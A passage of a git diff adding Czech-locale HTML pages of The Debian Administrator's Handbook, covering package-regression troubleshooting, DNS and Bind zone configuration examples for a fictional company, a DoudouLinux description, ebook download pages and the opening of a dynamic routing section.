+				You might sometimes find that the new version of a software doesn't work at all. This generally happens if the application isn't particularly popular and hasn't been tested enough; a last-minute update can also introduce regressions which are only found after the stable release. In both cases, the first thing to do is to have a look at the bug tracking system at <code
+              class="literal">https://bugs.debian.org/<em
+                class="replaceable">package</em></code>, and check whether the problem has already been reported. If it hasn't, you should report it yourself with <code
+              class="command">reportbug</code>. If it is already known, the bug report and the associated messages are usually an excellent source of information related to the bug:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						sometimes a patch already exists, and it is available on the bug report; you can then recompile a fixed version of the broken package locally (see <a
+                    class="xref"
+                    href="debian-packaging.html#sect.rebuilding-package">15.1 – „Rebuilding a Package from its Sources“</a>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						in other cases, users may have found a workaround for the problem and shared their insights about it in their replies to the report;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						in yet other cases, a fixed package may have already been prepared and made public by the maintainer.
+					</div></li></ul></div><div
+            class="para">
+				Depending on the severity of the bug, a new version of the package may be prepared specifically for a new revision of the stable release. When this happens, the fixed package is made available in the <code
+              class="literal">proposed-updates</code> section of the Debian mirrors (see <a
+              class="xref"
+              href="apt.html#sect.proposed-updates">6.1.2.3 – „Proposed Updates“</a>). The corresponding entry can then be temporarily added to the <code
+              class="filename">sources.list</code> file, and updated packages can be installed with <code
+              class="command">apt</code> or <code
+              class="command">aptitude</code>.
+			</div><div
+            class="para">
+				Sometimes the fixed package isn't available in this section yet because it is pending a validation by the Stable Release Managers. You can verify if that's the case on their web page. Packages listed there aren't available yet, but at least you know that the publication process is ongoing. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://release.debian.org/proposed-updates/stable.html">https://release.debian.org/proposed-updates/stable.html</a></div>
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.package-authentication.html"><strong>Předcházející</strong>6.5. Checking Package Authenticity</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.regular-upgrades.html"><strong>Další</strong>6.7. Keeping a System Up to Date</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.domain-name-servers.html b/tmp/cs-CZ/html/sect.domain-name-servers.html
new file mode 100644
index 000000000..207e6abc2
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.domain-name-servers.html
@@ -0,0 +1,355 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.6. Domain Name Servers (DNS)</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.ipv6.html"
+        title="10.5. IPv6" /><link
+        rel="next"
+        href="sect.dhcp.html"
+        title="10.7. DHCP" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.domain-name-servers.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ipv6.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dhcp.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.domain-name-servers"></a>10.6. Domain Name Servers (DNS)</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.dns-principe"></a>10.6.1. Principle and Mechanism</h3></div></div></div><a
+            id="id-1.13.9.2.2"
+            class="indexterm"></a><a
+            id="id-1.13.9.2.3"
+            class="indexterm"></a><div
+            class="para">
+				The <span
+              class="emphasis"><em>Domain Name Service</em></span> (DNS) is a fundamental component of the Internet: it maps host names to IP addresses (and vice-versa), which allows the use of <code
+              class="literal">www.debian.org</code> instead of <code
+              class="literal">5.153.231.4</code> or <code
+              class="literal">2001:41c8:1000:21::21:4</code>.
+			</div><div
+            class="para">
+				DNS records are organized in zones; each zone matches either a domain (or a subdomain) or an IP address range (since IP addresses are generally allocated in consecutive ranges). A primary server is authoritative on the contents of a zone; secondary servers, usually hosted on separate machines, provide regularly refreshed copies of the primary zone.
+			</div><a
+            id="id-1.13.9.2.6"
+            class="indexterm"></a><a
+            id="id-1.13.9.2.7"
+            class="indexterm"></a><div
+            class="para">
+				Each zone can contain records of various kinds (<span
+              class="emphasis"><em>Resource Records</em></span>):
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">A</code>: IPv4 address. <a
+                    id="id-1.13.9.2.9.1.1.2"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">CNAME</code>: alias (<span
+                    class="emphasis"><em>canonical name</em></span>). <a
+                    id="id-1.13.9.2.9.2.1.3"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">MX</code>: <span
+                    class="emphasis"><em>mail exchange</em></span>, an email server. This information is used by other email servers to find where to send email addressed to a given address. Each MX record has a priority. The highest-priority server (with the lowest number) is tried first (see sidebar <a
+                    class="xref"
+                    href="network-services.html#sidebar.smtp"><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> SMTP</a>); other servers are contacted in order of decreasing priority if the first one does not reply. <a
+                    id="id-1.13.9.2.9.3.1.4"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">PTR</code>: mapping of an IP address to a name. Such a record is stored in a “reverse DNS” zone named after the IP address range. For example, <code
+                    class="literal">1.168.192.in-addr.arpa</code> is the zone containing the reverse mapping for all addresses in the <code
+                    class="literal">192.168.1.0/24</code> range. <a
+                    id="id-1.13.9.2.9.4.1.4"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">AAAA</code>: IPv6 address. <a
+                    id="id-1.13.9.2.9.5.1.2"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">NS</code>: maps a name to a name server. Each domain must have at least one NS record. These records point at a DNS server that can answer queries concerning this domain; they usually point at the primary and secondary servers for the domain. These records also allow DNS delegation; for instance, the <code
+                    class="literal">falcot.com</code> zone can include an NS record for <code
+                    class="literal">internal.falcot.com</code>, which means that the <code
+                    class="literal">internal.falcot.com</code> zone is handled by another server. Of course, this server must declare an <code
+                    class="literal">internal.falcot.com</code> zone. <a
+                    id="id-1.13.9.2.9.6.1.6"
+                    class="indexterm"></a>
+					</div></li></ul></div><a
+            id="id-1.13.9.2.10"
+            class="indexterm"></a><a
+            id="id-1.13.9.2.11"
+            class="indexterm"></a><div
+            class="para">
+				The reference name server, Bind, was developed and is maintained by ISC (<span
+              class="emphasis"><em>Internet Software Consortium</em></span>). It is provided in Debian by the <span
+              class="pkg pkg">bind9</span> package. Version 9 brings two major changes compared to previous versions. First, the DNS server can now run under an unprivileged user, so that a security vulnerability in the server does not grant root privileges to the attacker (as was seen repeatedly with versions 8.x).
+			</div><div
+            class="para">
+				Furthermore, Bind supports the DNSSEC standard for signing (and therefore authenticating) DNS records, which allows blocking any spoofing of this data during man-in-the-middle attacks.
+			</div><a
+            id="id-1.13.9.2.14"
+            class="indexterm"></a><a
+            id="id-1.13.9.2.15"
+            class="indexterm"></a><a
+            id="id-1.13.9.2.16"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> DNSSEC</strong></p></div></div></div><a
+              id="id-1.13.9.2.17.2"
+              class="indexterm"></a><div
+              class="para">
+				The DNSSEC norm is quite complex; this partly explains why it is not in widespread usage yet (even if it perfectly coexists with DNS servers unaware of DNSSEC). To understand all the ins and outs, you should check the following article. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions">http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions</a></div>
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.dns-config"></a>10.6.2. Configuring</h3></div></div></div><div
+            class="para">
+				Configuration files for <code
+              class="command">bind</code>, irrespective of version, have the same structure.
+			</div><div
+            class="para">
+				The Falcot administrators created a primary <code
+              class="literal">falcot.com</code> zone to store information related to this domain, and a <code
+              class="literal">168.192.in-addr.arpa</code> zone for reverse mapping of IP addresses in the local networks.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Names of reverse zones</strong></p></div></div></div><a
+              id="id-1.13.9.3.4.2"
+              class="indexterm"></a><a
+              id="id-1.13.9.3.4.3"
+              class="indexterm"></a><a
+              id="id-1.13.9.3.4.4"
+              class="indexterm"></a><a
+              id="id-1.13.9.3.4.5"
+              class="indexterm"></a><a
+              id="id-1.13.9.3.4.6"
+              class="indexterm"></a><div
+              class="para">
+				Reverse zones have a particular name. The zone covering the <code
+                class="literal">192.168.0.0/16</code> network needs to be named <code
+                class="literal">168.192.in-addr.arpa</code>: the IP address components are reversed, and followed by the <code
+                class="literal">in-addr.arpa</code> suffix.
+			</div><div
+              class="para">
+				For IPv6 networks, the suffix is <code
+                class="literal">ip6.arpa</code> and the IP address components which are reversed are each character in the full hexadecimal representation of the IP address. As such, the <code
+                class="literal">2001:0bc8:31a0::/48</code> network would use a zone named <code
+                class="literal">0.a.1.3.8.c.b.0.1.0.0.2.ip6.arpa</code>.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Testing the DNS server</strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="command">host</code> command (in the <span
+                class="pkg pkg">bind9-host</span> package) queries a DNS server, and can be used to test the server configuration. For example, <code
+                class="command">host machine.falcot.com localhost</code> checks the local server's reply for the <code
+                class="literal">machine.falcot.com</code> query. <code
+                class="command">host <em
+                  class="replaceable">ipaddress</em> localhost</code> tests the reverse resolution.
+			</div><a
+              id="id-1.13.9.3.5.3"
+              class="indexterm"></a></div><div
+            class="para">
+				The following configuration excerpts, taken from the Falcot files, can serve as starting points to configure a DNS server:
+			</div><a
+            id="id-1.13.9.3.7"
+            class="indexterm"></a><a
+            id="id-1.13.9.3.8"
+            class="indexterm"></a><div
+            class="example"><a
+              xmlns=""
+              id="example.bind-named.conf.local"></a><p
+              class="title"><strong>Příklad 10.12. Excerpt of <code
+                  class="filename">/etc/bind/named.conf.local</code></strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+zone "falcot.com" {
+        type master;
+        file "/etc/bind/db.falcot.com";
+        allow-query { any; };
+        allow-transfer {
+                195.20.105.149/32 ; // ns0.xname.org
+                193.23.158.13/32 ; // ns1.xname.org
+        };
+};
+
+zone "internal.falcot.com" {
+        type master;
+        file "/etc/bind/db.internal.falcot.com";
+        allow-query { 192.168.0.0/16; };
+};
+
+zone "168.192.in-addr.arpa" {
+        type master;
+        file "/etc/bind/db.192.168";
+        allow-query { 192.168.0.0/16; };
+};
+</pre></div></div><div
+            class="example"><a
+              xmlns=""
+              id="example.bind-db.falcot.com"></a><p
+              class="title"><strong>Příklad 10.13. Excerpt of <code
+                  class="filename">/etc/bind/db.falcot.com</code></strong></p><div
+              class="example-contents"><pre
+                class="programlisting">; falcot.com Zone 
+; admin.falcot.com. =&gt; zone contact: admin@falcot.com
+$TTL    604800
+@       IN      SOA     falcot.com. admin.falcot.com. (
+                        20040121        ; Serial
+                         604800         ; Refresh
+                          86400         ; Retry
+                        2419200         ; Expire
+                         604800 )       ; Negative Cache TTL
+;
+; The @ refers to the zone name ("falcot.com" here)
+; or to $ORIGIN if that directive has been used
+;
+@       IN      NS      ns
+@       IN      NS      ns0.xname.org.
+
+internal IN      NS      192.168.0.2
+
+@       IN      A       212.94.201.10
+@       IN      MX      5 mail
+@       IN      MX      10 mail2
+
+ns      IN      A       212.94.201.10
+mail    IN      A       212.94.201.10
+mail2   IN      A       212.94.201.11
+www     IN      A       212.94.201.11
+
+dns     IN      CNAME   ns
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Syntax of a name</strong></p></div></div></div><div
+              class="para">
+				The syntax of machine names follows strict rules. For instance, <code
+                class="literal">machine</code> implies <code
+                class="literal">machine.<em
+                  class="replaceable">domain</em></code>. If the domain name should not be appended to a name, said name must be written as <code
+                class="literal">machine.</code> (with a dot as suffix). Indicating a DNS name outside the current domain therefore requires a syntax such as <code
+                class="literal">machine.otherdomain.com.</code> (with the final dot).
+			</div></div><div
+            class="example"><a
+              xmlns=""
+              id="example.bind-db.192.168"></a><p
+              class="title"><strong>Příklad 10.14. Excerpt of <code
+                  class="filename">/etc/bind/db.192.168</code></strong></p><div
+              class="example-contents"><pre
+                class="programlisting">; Reverse zone for 192.168.0.0/16
+; admin.falcot.com. =&gt; zone contact: admin@falcot.com
+$TTL    604800
+@       IN      SOA     ns.internal.falcot.com. admin.falcot.com. (
+                        20040121        ; Serial
+                         604800         ; Refresh
+                          86400         ; Retry
+                        2419200         ; Expire
+                         604800 )       ; Negative Cache TTL
+
+        IN      NS      ns.internal.falcot.com.
+
+; 192.168.0.1 -&gt; arrakis
+1.0     IN      PTR     arrakis.internal.falcot.com.
+; 192.168.0.2 -&gt; neptune
+2.0     IN      PTR     neptune.internal.falcot.com.
+
+; 192.168.3.1 -&gt; pau
+1.3     IN      PTR     pau.internal.falcot.com.
+</pre></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ipv6.html"><strong>Předcházející</strong>10.5. IPv6</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dhcp.html"><strong>Další</strong>10.7. DHCP</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.doudoulinux.html b/tmp/cs-CZ/html/sect.doudoulinux.html
new file mode 100644
index 000000000..f6018a21d
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.doudoulinux.html
@@ -0,0 +1,87 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.11. DoudouLinux</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.tanglu.html"
+        title="A.10. Tanglu" /><link
+        rel="next"
+        href="sect.raspbian.html"
+        title="A.12. Raspbian" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.doudoulinux.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.tanglu.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.raspbian.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.doudoulinux"></a>A.11. DoudouLinux</h2></div></div></div><a
+          id="id-1.20.14.2"
+          class="indexterm"></a><div
+          class="para">
+			DoudouLinux targets young children (starting from 2 years old). To achieve this goal, it provides an heavily customized graphical interface (based on LXDE) and comes with many games and educative applications. Internet access is filtered to prevent children from visiting problematic websites. Advertisements are blocked. The goal is that parents should be free to let their children use their computer once booted into DoudouLinux. And children should love using DoudouLinux, just like they enjoy their gaming console. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.doudoulinux.org">http://www.doudoulinux.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.tanglu.html"><strong>Předcházející</strong>A.10. Tanglu</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.raspbian.html"><strong>Další</strong>A.12. Raspbian</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.download-the-book.html b/tmp/cs-CZ/html/sect.download-the-book.html
new file mode 100644
index 000000000..83655d59e
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.download-the-book.html
@@ -0,0 +1,95 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">D.3. Download the book</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="website.html"
+        title="Příloha D. Get the book" /><link
+        rel="prev"
+        href="sect.download-the-electronic-version.html"
+        title="D.2. Download the electronic version" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.download-the-book.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.download-the-electronic-version.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.download-the-book"></a>D.3. Download the book</h2></div></div></div><div
+          class="para">
+			<span
+            class="emphasis"><em>Thank you very much for your donation</em></span>. We really appreciate it. We hope that you will enjoy our book!
+		</div><div
+          class="para">
+			The book is available in 3 formats and multiple languages (see other tabs for translations).
+		</div><div
+          class="para">
+			The PDF format is the document corresponding to the printed book. It's not suitable for reading on small screens. The EPUB format is the recommended format if your reading devices supports it (most smartphones and many ebook readers do support it). The Mobipocket format is mainly for ebook readers that do not support EPUB (like the Kindle).
+		</div><div
+          class="para">
+			Click on the link of the version that you wish to download:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					English PDF (30 Mb)
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					English EPUB (5 Mb)
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					English Mobipocket (13 Mb)
+				</div></li></ul></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.download-the-electronic-version.html"><strong>Předcházející</strong>D.2. Download the electronic version</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.download-the-electronic-version.html b/tmp/cs-CZ/html/sect.download-the-electronic-version.html
new file mode 100644
index 000000000..421a79203
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.download-the-electronic-version.html
@@ -0,0 +1,89 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">D.2. Download the electronic version</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="website.html"
+        title="Příloha D. Get the book" /><link
+        rel="prev"
+        href="website.html"
+        title="Příloha D. Get the book" /><link
+        rel="next"
+        href="sect.download-the-book.html"
+        title="D.3. Download the book" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.download-the-electronic-version.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="website.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.download-the-book.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.download-the-electronic-version"></a>D.2. Download the electronic version</h2></div></div></div><div
+          class="para">
+			The e-book is available in 3 formats (PDF, EPUB, Mobipocket) and multiple languages.
+		</div><div
+          class="para">
+			The book is freely available because we want everybody to benefit from it. That said maintaining it for each new Debian release takes time and lots of effort, and we appreciate being thanked for this. If you find this book valuable, please consider contributing to its continued maintenance either by buying a paperback copy or by making a donation via the form below (after having completed your donation, you will be automatically directed to the download page).
+		</div><div
+          class="para">
+			Pick your contribution:
+		</div><div
+          class="para">
+			You can also directly download the book on <a
+            href="https://debian-handbook.info/get/now/">this page</a>. In that case, we hope that you will contribute to the book's success by spreading the word around you. Of course, you can always come back later to make a donation.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="website.html"><strong>Předcházející</strong>Příloha D. Get the book</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.download-the-book.html"><strong>Další</strong>D.3. Download the book</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.dynamic-routing.html b/tmp/cs-CZ/html/sect.dynamic-routing.html
new file mode 100644
index 000000000..bfa627062
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.dynamic-routing.html
@@ -0,0 +1,168 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.4. Dynamic Routing</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.quality-of-service.html"
+        title="10.3. Quality of Service" /><link
+        rel="next"
+        href="sect.ipv6.html"
+        title="10.5. IPv6" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.dynamic-routing.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.quality-of-service.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ipv6.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.dynamic-routing"></a>10.4. Dynamic Routing</h2></div></div></div><a
+          id="id-1.13.7.2"
+          class="indexterm"></a><a
+          id="id-1.13.7.3"
+          class="indexterm"></a><a
+          id="id-1.13.7.4"
+          class="indexterm"></a><div
+          class="para">
+			The reference tool for dynamic routing is currently <code
+            class="command">quagga</code>, from the similarly-named package; it used to be <code
+            class="command">zebra</code> until development of the latter stopped. However, <code
+            class="command">quagga</code> kept the names of the programs for compatibility reasons which explains the <code
+            class="command">zebra</code> commands below.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Dynamic routing</strong></p></div></div></div><div
+            class="para">
